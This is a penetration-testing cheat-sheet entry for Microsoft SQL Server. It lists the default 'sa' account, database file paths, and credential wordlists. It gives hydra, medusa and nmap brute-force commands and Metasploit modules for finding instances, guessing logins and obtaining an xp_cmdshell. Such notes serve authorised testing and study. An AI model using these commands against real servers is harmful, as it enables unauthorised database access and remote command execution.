TCP 1433, UDP 1434: MSSQL Server

Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network.

-- Wikipedia

Related

SQSH

General

Default admin account: sa

Interesting paths (example: Microsoft SQL Server 2017 14.00.1000.00)

C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\DATA\master.mdf

C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf

C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.bak

Brute force login

Wordlists

/usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt

/usr/share/seclists/Usernames/mssql-usernames-nansh0u-guardicore.txt

/usr/share/seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt

Tools

hydra -L <users-file> -P <pw-file> <ip> mssql -vV

medusa -U <users-file> -P <pw-file> -M mssql -h <ip>

nmap -p 1433 --script=ms-sql-brute.nse --script-args userdb<users-file,passdb=<pw-file> <ip>

Metasploit

• Hunting for MSSQL - Metasploit Unleashed

• How to Hack Databases: Cracking SQL Server Passwords & Owning the Server « Null Byte :: WonderHowTo

Find MSSQL instances

auxiliary/scanner/mssql/mssql_ping

Brute force login

scanner/mssql/mssql_login

Obtain a xp_cmdshell using

windows/mssql/mssql_payload